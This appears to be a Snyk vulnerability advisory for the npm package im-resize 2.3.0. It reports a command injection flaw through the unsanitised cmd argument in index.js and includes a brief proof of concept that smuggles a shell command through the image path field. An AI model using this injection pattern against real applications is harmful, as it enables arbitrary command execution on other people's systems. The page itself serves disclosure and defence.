im-resize@2.3.0 vulnerabilities

Efficient image resize with multiple versions support

Direct Vulnerabilities

Known vulnerabilities in the im-resize package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free
VulnerabilityVulnerable Version
  • H
Command Injection

im-resize is an efficient image resize with support for multiple thumbnail configurations using ImageMagick's convert command.

Affected versions of this package are vulnerable to Command Injection. The cmd argument used within index.js, can be controlled by user without any sanitization.

PoC by JHU System Security Lab

var root = require('im-resize')
var image = {
"path": "& echo vulnerable > create.txt &"

}
var output ={
"versions":[]
}
root(image,output,function(){});

How to fix Command Injection?

A fix was pushed into the master branch but not yet published.

*